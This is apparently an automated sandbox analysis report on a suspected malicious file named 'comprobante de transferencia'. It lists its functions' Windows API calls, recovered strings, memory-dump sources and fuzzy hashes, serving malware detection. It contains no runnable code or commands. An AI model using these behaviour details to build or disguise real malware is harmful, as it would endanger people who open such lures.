Instruction ID: 65d5ab9259d91c2bacb7ef6b48f5d1866d8ba283aa313fb803700325098fdbf5
Opcode Fuzzy Hash: df6d4e3514f5f8de39a61b17f245f4e72de38fd45ac00d00fcdfbee9dbeb03e2
Instruction Fuzzy Hash: 575157B090434A9FDB00CFAAC448BDEBBF1EF49310F24845AD419A7352D734A944CF65

Uniqueness

Uniqueness Score: -1.00%

Function 3705C0C0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 3705C13E
GetCurrentThread.KERNEL32 ref: 3705C17B
GetCurrentProcess.KERNEL32 ref: 3705C1B8
GetCurrentThreadId.KERNEL32 ref: 3705C211

Memory Dump Source

Source File: 00000002.00000002.7703129668.0000000037050000.00000040.00000800.00020000.00000000.sdmp, Offset: 37050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37050000_comprobante de transferencia.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: dd39ebe6d0072472fe1dc2089fa17719a7c131d5a43fd13a660d301ce25f6d6e
Instruction ID: 2e3720afdd4ceec4bd7aefb3da6f013a0a8f29b8930cee5ef562fb90a996b6b2
Opcode Fuzzy Hash: dd39ebe6d0072472fe1dc2089fa17719a7c131d5a43fd13a660d301ce25f6d6e
Instruction Fuzzy Hash: BA5135B190074A9FDB10DFAAD588BDEBBF1AF88310F20845AD419B7351DB34A984CF65

Uniqueness

Uniqueness Score: -1.00%

Function 3714A3C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 3714B31D

Strings

T>E6, xrefs: 3714A3C0

Memory Dump Source

Source File: 00000002.00000002.7703237352.0000000037140000.00000040.00000800.00020000.00000000.sdmp, Offset: 37140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37140000_comprobante de transferencia.jbxd

Similarity

API ID: Initialize
String ID: T>E6
API String ID: 2538663250-157983146
Opcode ID: 3a7aa969023c033634a6d75f3f484087707d168cfe8498980eef656ff6ce289e
Instruction ID: 8296038bbcee6cc64f90257433aa9f759ac4c8d3457a7d9bf43c5dfe12d2ef40
Opcode Fuzzy Hash: 3a7aa969023c033634a6d75f3f484087707d168cfe8498980eef656ff6ce289e
Instruction Fuzzy Hash: F11115B59003488FDB20DF9AD484BDEFBF4EB48320F20845AD519A7700D378A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 37146504 Relevance: 1.6, APIs: 1, Instructions: 117COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 37146622

Memory Dump Source

Source File: 00000002.00000002.7703237352.0000000037140000.00000040.00000800.00020000.00000000.sdmp, Offset: 37140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37140000_comprobante de transferencia.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 7918e9dc7b60f71c83eacb166cf30f45e93d3b2f24a0a75714e132b3dfd788ff
Instruction ID: edf7ea5abdec4562ed68f54d57b2bcf617f6b873f1a387f51de1ea5067434d7a
Opcode Fuzzy Hash: 7918e9dc7b60f71c83eacb166cf30f45e93d3b2f24a0a75714e132b3dfd788ff
Instruction Fuzzy Hash: C251E3B1D10349AFDB15CFA9C980ADEFFB5BF48314F24812AE418AB210D771A985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 37146510 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 37146622

Memory Dump Source

Source File: 00000002.00000002.7703237352.0000000037140000.00000040.00000800.00020000.00000000.sdmp, Offset: 37140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37140000_comprobante de transferencia.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: c41e3d5c040bcbdeb8eba036d599ca22cd8fbf0d1e2b21b508c77db085aad539
Instruction ID: 0c341be8963fae65538eec3bb8d78e5e133b4ae4bf78978b7726e13d676751a2
Opcode Fuzzy Hash: c41e3d5c040bcbdeb8eba036d599ca22cd8fbf0d1e2b21b508c77db085aad539
Instruction Fuzzy Hash: 1C41D5B1D10349DFDB14CF99D984ADDFBB5BF48314F20812AE419AB210D775A985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00158044 Relevance: 1.6, APIs: 1, Instructions: 101libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 00158137

Memory Dump Source

Source File: 00000002.00000002.7679251200.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_comprobante de transferencia.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6c1b8d10b7350cbe01f73b51f053e550e164f3a21d3ea9ec18fc42392cacd189
Instruction ID: 18efbca75617fac50e8db5128f4590830ebaca4bccc50b7b37dd2c956e3fa309
Opcode Fuzzy Hash: 6c1b8d10b7350cbe01f73b51f053e550e164f3a21d3ea9ec18fc42392cacd189
Instruction Fuzzy Hash: C9415E70D00758DFDB10CFA9C88179EBBF1AB49300F14812AE865EB384DB75988ACF51

Uniqueness

Uniqueness Score: -1.00%

Function 3714364C Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 37148D11

Memory Dump Source

Source File: 00000002.00000002.7703237352.0000000037140000.00000040.00000800.00020000.00000000.sdmp, Offset: 37140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37140000_comprobante de transferencia.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 6c1b6f1c85adfc572472597fdcb1f00840221ced94a8faae87b57221df0c5320
Instruction ID: 8c2cf2be43d877b2e5e01ff8e8517bf1cac1ac01cdeb29790652e6ba618b5550
Opcode Fuzzy Hash: 6c1b6f1c85adfc572472597fdcb1f00840221ced94a8faae87b57221df0c5320
Instruction Fuzzy Hash: 9D4125B9900305DFDB14CF99C484BAABBF5FF99320F258859D519AB321D7B4A841CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00154E74 Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 00158137

Memory Dump Source

Source File: 00000002.00000002.7679251200.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_comprobante de transferencia.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5ed94e1cbdfd860b69beb8b7414918b8c56a74f427f4b4bcdd53f69a1fe46791
Instruction ID: f3af182b45a7b6f26367b9e7458d207788701ad9cdd7410a6cb664e55cedd56a
Opcode Fuzzy Hash: 5ed94e1cbdfd860b69beb8b7414918b8c56a74f427f4b4bcdd53f69a1fe46791
Instruction Fuzzy Hash: 254127B0D00658DFDB10DFA9C88579EBBF1AB48304F148129E825BB385DB75988ACF95

Uniqueness

Uniqueness Score: -1.00%

Function 3705C300 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3705C38F

Memory Dump Source

Source File: 00000002.00000002.7703129668.0000000037050000.00000040.00000800.00020000.00000000.sdmp, Offset: 37050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37050000_comprobante de transferencia.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7805e9ecbca447e36a430a25f17bca87384264fa9033ee38efdb2ed23c8ba8a8
Instruction ID: 6238d8c11f91a369adf66943a05ba58003232eec291c0f1377e853c29e214cbf
Opcode Fuzzy Hash: 7805e9ecbca447e36a430a25f17bca87384264fa9033ee38efdb2ed23c8ba8a8
Instruction Fuzzy Hash: 9E21F4B5900249AFDB10CFAAD884ADEBBF4EB48320F14845AE954A3311D378A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 3705C308 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3705C38F

Memory Dump Source

Source File: 00000002.00000002.7703129668.0000000037050000.00000040.00000800.00020000.00000000.sdmp, Offset: 37050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37050000_comprobante de transferencia.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: bfd75020b7ccc570061f07e239eb678ed945e5997d00949cad856a6a28a53d61
Instruction ID: 96a86cd23a96a9f437e73a98110cfe2465cf153e05bf49d50ac9897550076426
Opcode Fuzzy Hash: bfd75020b7ccc570061f07e239eb678ed945e5997d00949cad856a6a28a53d61
Instruction Fuzzy Hash: AA21D5B5D00349AFDB10CFAAD984ADEFBF4EB48320F14845AE954A7310D378A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 37141388 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

FindWindowW.USER32(00000000,00000000), ref: 37141406

Memory Dump Source

Source File: 00000002.00000002.7703237352.0000000037140000.00000040.00000800.00020000.00000000.sdmp, Offset: 37140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37140000_comprobante de transferencia.jbxd

Similarity

API ID: FindWindow
String ID:
API String ID: 134000473-0
Opcode ID: 547ab286f0f85cc06b3a611c50318c69b67de9c77bbfb516ea42db6d9cf4eb74
Instruction ID: bbc93536511a578356c423d51b7a10c35fdc0655c1f259dfba5cd91ae22b0be3
Opcode Fuzzy Hash: 547ab286f0f85cc06b3a611c50318c69b67de9c77bbfb516ea42db6d9cf4eb74
Instruction Fuzzy Hash: 00212FBAC007499FCB00CF9AD884ADEFBB4FB49320F64852ED819B7601D374A544CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 37141390 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

FindWindowW.USER32(00000000,00000000), ref: 37141406

Memory Dump Source

Source File: 00000002.00000002.7703237352.0000000037140000.00000040.00000800.00020000.00000000.sdmp, Offset: 37140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37140000_comprobante de transferencia.jbxd

Similarity

API ID: FindWindow
String ID:
API String ID: 134000473-0
Opcode ID: f43ed1d09682aef759a8b8c2b3e12338a63232430aa6878fd43fd4c0ce3657cb
Instruction ID: f6589d28cafa75acfbf29d0775bf366ab9de111bafa503683e8aa0f646b67335
Opcode Fuzzy Hash: f43ed1d09682aef759a8b8c2b3e12338a63232430aa6878fd43fd4c0ce3657cb
Instruction Fuzzy Hash: 9C1100BAD003099FDB10CF9AD884ADEFBB4FB49320F54852ED419B7600D375A544CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 000AD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.7678864557.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ad000_comprobante de transferencia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 731edb0dea1f5f9cf1d500333f3bd7c205c79dbd3d8abafef6de9f9942c24a69
Instruction ID: 52dd5180c4d7ac1afe7a30ff7dcb44aadfedad14e6ce351c3d5da890896af0fd
Opcode Fuzzy Hash: 731edb0dea1f5f9cf1d500333f3bd7c205c79dbd3d8abafef6de9f9942c24a69
Instruction Fuzzy Hash: 36213471604340EFDB20DF64D9C4F16BBA1EB89314F30C56AD84A4F646C336D847CA62

Uniqueness

Uniqueness Score: -1.00%

Function 000AD017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.7678864557.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ad000_comprobante de transferencia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0cd37bb732839d99b1d32613c8d16dd7f2fc421af5c79a5997912ce9efe1ff0
Instruction ID: f5d2ac23b99508816e156620a617840a325b62789a28b2feeb08b0378c61d4b3
Opcode Fuzzy Hash: d0cd37bb732839d99b1d32613c8d16dd7f2fc421af5c79a5997912ce9efe1ff0
Instruction Fuzzy Hash: 8C11DD75504280DFCB11CF54D5C4B15FBA2FB89314F28C6AAD84A4BA56C33AD84ACBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040326A Relevance: 75.7, APIs: 33, Strings: 10, Instructions: 401stringfilecomCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 0040328D
GetVersion.KERNEL32 ref: 00403293
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032BC
#17.COMCTL32(00000007,00000009), ref: 004032DF
OleInitialize.OLE32(00000000), ref: 004032E6
SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 00403302
GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 00403317
GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 0040332A
CharNextW.USER32(00000000,00434000,00000020), ref: 00403351

Part of subcall function 004063F4: GetModuleHandleA.KERNEL32(?,00000020,?,004032D3,00000009), ref: 00406406
Part of subcall function 004063F4: GetProcAddress.KERNEL32(00000000,?), ref: 00406421

GetTempPathW.KERNEL32(00000400,00436800), ref: 0040348B
GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040349C
lstrcatW.KERNEL32(00436800,\Temp), ref: 004034A8
GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 004034BC
lstrcatW.KERNEL32(00436800,Low), ref: 004034C4
SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 004034D5
SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 004034DD
DeleteFileW.KERNEL32(00436000), ref: 004034F1

Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027

OleUninitialize.OLE32(?), ref: 004035BC
ExitProcess.KERNEL32 ref: 004035DD
lstrcatW.KERNEL32(00436800,~nsu), ref: 004035F0
lstrcatW.KERNEL32(00436800,0040926C), ref: 004035FF
lstrcatW.KERNEL32(00436800,.tmp), ref: 0040360A
lstrcmpiW.KERNEL32(00436800,00435800,00436800,.tmp,00436800,~nsu,00434000,00000000,?), ref: 00403616
SetCurrentDirectoryW.KERNEL32(00436800,00436800), ref: 00403632
DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 0040368C
CopyFileW.KERNEL32(00437800,0041FEA8,?), ref: 004036A0
CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 004036CD
GetCurrentProcess.KERNEL32(00000028,?), ref: 004036FC
OpenProcessToken.ADVAPI32(00000000), ref: 00403703
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403718
AdjustTokenPrivileges.ADVAPI32 ref: 0040373B
ExitWindowsEx.USER32(00000002,80040002), ref: 00403760
ExitProcess.KERNEL32 ref: 00403783

Strings

~nsu, xrefs: 004035E8
Error launching installer, xrefs: 00403573
Low, xrefs: 004034BE
SeShutdownPrivilege, xrefs: 00403712
.tmp, xrefs: 00403604
\Temp, xrefs: 004034A2
NSIS Error, xrefs: 00403308
TMP, xrefs: 004034D8
UXTHEME, xrefs: 004032B0, 004032B5, 004032BB
TEMP, xrefs: 004034D0

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: .tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 2488574733-3195845224
Opcode ID: a996e24322ab931b25b24e828b6ef98328f30ad14b7f21a8712b1f312c2e0a74
Instruction ID: 73295983c26b9bc795aacbdf710e3d5853a553e8a558082b103844ae68e0e3ab
Opcode Fuzzy Hash: a996e24322ab931b25b24e828b6ef98328f30ad14b7f21a8712b1f312c2e0a74
Instruction Fuzzy Hash: C3D1F470644200BBD720BF659D45A3B3AACEB8074AF10487EF541B62D2DB7D9D42CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 00404AF5 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404B0D
GetDlgItem.USER32(?,00000408), ref: 00404B18
GlobalAlloc.KERNEL32(00000040,?), ref: 00404B62
LoadBitmapW.USER32(0000006E), ref: 00404B75
SetWindowLongW.USER32(?,000000FC,004050ED), ref: 00404B8E
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BA2
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BB4
SendMessageW.USER32(?,00001109,00000002), ref: 00404BCA
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BD6
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404BE8
DeleteObject.GDI32(00000000), ref: 00404BEB
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C16
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C22
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CB8
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CE3
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF7
GetWindowLongW.USER32(?,000000F0), ref: 00404D26
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D34
ShowWindow.USER32(?,00000005), ref: 00404D45
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E42
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EA7
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EBC
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EE0
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F00
ImageList_Destroy.COMCTL32(?), ref: 00404F15
GlobalFree.KERNEL32(?), ref: 00404F25
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404F9E
SendMessageW.USER32(?,00001102,?,?), ref: 00405047
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405056
InvalidateRect.USER32(?,00000000,?), ref: 00405076
ShowWindow.USER32(?,00000000), ref: 004050C4
GetDlgItem.USER32(?,000003FE), ref: 004050CF
ShowWindow.USER32(00000000), ref: 004050D6

Strings

, xrefs: 004050AE
N, xrefs: 00404D80
M, xrefs: 00404C9F

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: d25dd17f0ef4f42499fd80d9816131724b7700db04961f8c60a4f0c198e52f9b
Instruction ID: 2f8963ba0b06e8e3d6cb077b811a33c65d2f4829f178f5176880c359a33aa38b
Opcode Fuzzy Hash: d25dd17f0ef4f42499fd80d9816131724b7700db04961f8c60a4f0c198e52f9b
Instruction Fuzzy Hash: 1D026FB0A00209EFDB249F54DD45AAE7BB5FB84314F10857AF610BA2E1C7799D42CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040580B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,76BF3420,00436800,00000000), ref: 00405834
lstrcatW.KERNEL32(004246F0,\*.*), ref: 0040587C
lstrcatW.KERNEL32(?,00409014), ref: 0040589F
lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,76BF3420,00436800,00000000), ref: 004058A5
FindFirstFileW.KERNEL32(004246F0,?,?,?,00409014,?,004246F0,?,?,76BF3420,00436800,00000000), ref: 004058B5
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405955
FindClose.KERNEL32(00000000), ref: 00405964

Strings

\*.*, xrefs: 00405876

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 2035342205-1173974218
Opcode ID: b22725c9d1379137a20526b6b5dca3a9dfa803cbd6e10eb7e01ed1832fa3af48
Instruction ID: b6454d918ebd5faba2d20934ef042a1c7892e73fe5aa147b237895e66f915a66
Opcode Fuzzy Hash: b22725c9d1379137a20526b6b5dca3a9dfa803cbd6e10eb7e01ed1832fa3af48
Instruction Fuzzy Hash: 0041BF71900A14FACB21AB658C89EBF7678EB41768F10817BF801751D1D77C4981DEAE

Uniqueness

Uniqueness Score: -1.00%

Function 004066E2 Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e2f680ccc61635b902b5d27a35f9f4c181eb1db892f7aa35b7a4bb0f1103339
Instruction ID: 8bf6f29b28aad36262c5774fab9fc5fc8376212b20b0a75e389b428f0a59168b
Opcode Fuzzy Hash: 0e2f680ccc61635b902b5d27a35f9f4c181eb1db892f7aa35b7a4bb0f1103339
Instruction Fuzzy Hash: B5F16571D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A9ACF44

Uniqueness

Uniqueness Score: -1.00%

Function 0040635D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(76BF3420,00425738,00424EF0,00405B1F,00424EF0,00424EF0,00000000,00424EF0,00424EF0,76BF3420,?,00436800,0040582B,?,76BF3420,00436800), ref: 00406368
FindClose.KERNEL32(00000000), ref: 00406374

Strings

8WB, xrefs: 0040635E

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: 8WB
API String ID: 2295610775-3088156181
Opcode ID: 4919aa1d8c56feb8b367bbb1b86ee1180edd575772c83518e79227edefbba0cf
Instruction ID: 8488419dd32d28aa1913c95702376fed147eab6209e3de196541cdf70887181d
Opcode Fuzzy Hash: 4919aa1d8c56feb8b367bbb1b86ee1180edd575772c83518e79227edefbba0cf
Instruction Fuzzy Hash: BED01231949120ABC31417786D0C88B7A599F553317218E33F82AF53E0C3348C2586E9

Uniqueness

Uniqueness Score: -1.00%

Function 004052B8 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00405316
GetDlgItem.USER32(?,000003EE), ref: 00405325
GetClientRect.USER32(?,?), ref: 00405362
GetSystemMetrics.USER32(00000002), ref: 00405369
SendMessageW.USER32(?,00001061,00000000,?), ref: 0040538A
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040539B
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053AE
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053BC
SendMessageW.USER32(?,00001024,00000000,?), ref: 004053CF
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004053F1
ShowWindow.USER32(?,00000008), ref: 00405405
GetDlgItem.USER32(?,000003EC), ref: 00405426
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405436
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040544F
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040545B
GetDlgItem.USER32(?,000003F8), ref: 00405334

Part of subcall function 00404113: SendMessageW.USER32(00000028,?,?,00403F3F), ref: 00404121

GetDlgItem.USER32(?,000003EC), ref: 00405478
CreateThread.KERNEL32(00000000,00000000,Function_0000524C,00000000), ref: 00405486
CloseHandle.KERNEL32(00000000), ref: 0040548D
ShowWindow.USER32(00000000), ref: 004054B1
ShowWindow.USER32(?,00000008), ref: 004054B6
ShowWindow.USER32(00000008), ref: 00405500
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405534
CreatePopupMenu.USER32 ref: 00405545
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405559
GetWindowRect.USER32(?,?), ref: 00405579
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405592
SendMessageW.USER32(?,00001073,00000000,?), ref: 004055CA
OpenClipboard.USER32(00000000), ref: 004055DA
EmptyClipboard.USER32 ref: 004055E0
GlobalAlloc.KERNEL32(00000042,00000000), ref: 004055EC
GlobalLock.KERNEL32(00000000), ref: 004055F6
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040560A
GlobalUnlock.KERNEL32(00000000), ref: 0040562A
SetClipboardData.USER32(0000000D,00000000), ref: 00405635
CloseClipboard.USER32 ref: 0040563B

Strings

{, xrefs: 0040551E
&B, xrefs: 004055A6

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {$&B
API String ID: 590372296-2518801558
Opcode ID: 94329a2446787e458264516a02e4cd75579e620ce323967de0f368c62f847a1a
Instruction ID: b072520f5ee80a331e4e918265d0c1a5052efaeab479527f9264255038cc5675
Opcode Fuzzy Hash: 94329a2446787e458264516a02e4cd75579e620ce323967de0f368c62f847a1a
